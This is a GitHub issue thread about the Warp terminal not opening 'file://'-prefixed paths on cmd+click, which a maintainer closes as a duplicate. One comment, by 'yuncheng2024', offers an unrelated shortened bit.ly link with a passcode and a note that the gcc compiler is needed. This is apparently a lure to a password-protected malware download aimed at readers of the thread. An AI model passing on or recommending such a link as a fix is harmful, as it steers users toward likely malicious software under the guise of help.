### ISSUE TITLE
Exclude `file:` prefix from `cmd + click` event

### ISSUE THREAD

**Issue by waaadim** [warpdotdev/Warp#5281]
### Dupe Check

- [X] I have [searched Warp feature requests](https://github.com/warpdotdev/warp/issues?q=is%3Aissue+label%3A%22Feature+requests%22) and there are no duplicates

### Describe the solution you'd like?

When file uris are displayed, `cmd + click` does not open it if it has a `file:` prefix

for example:
```
# works
///Users/.../common/progress/progressView.brs:21
/Users/.../common/progress/progressView.brs:21

doesn't work
file:///Users/.../common/progress/progressView.brs:21
```

### Is your feature request related to a problem? Please describe.

I'm frustrated because this works in iTerm

### Additional context

this is how `cmd + hover` looks like in iTerm and Warp

<img width="1013" alt="Screenshot 2024-09-06 at 08 54 14" src="https://github.com/user-attachments/assets/70f43805-db87-4838-98c7-2a1b7335aac6">
<img width="1028" alt="Screenshot 2024-09-06 at 08 55 00" src="https://github.com/user-attachments/assets/44f036fb-e342-4f98-954f-389498940e10">

### How important is this feature to you?

4

### Warp Internal (ignore) - linear-label:39cc6478-1249-4ee7-950b-c428edfeecd1

None

**Comment by yuncheng2024** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by dannyneira** [comment]
Hi @waaadim sorry about this issue. Thanks for letting us know.

We're tracking this issue over at https://github.com/warpdotdev/Warp/issues/3970 and would appreciate it if you could 👍 and comment there if you're also experiencing the same bug. This helps us gauge the impact of the issue. 

We'll be closing this as a duplicate.
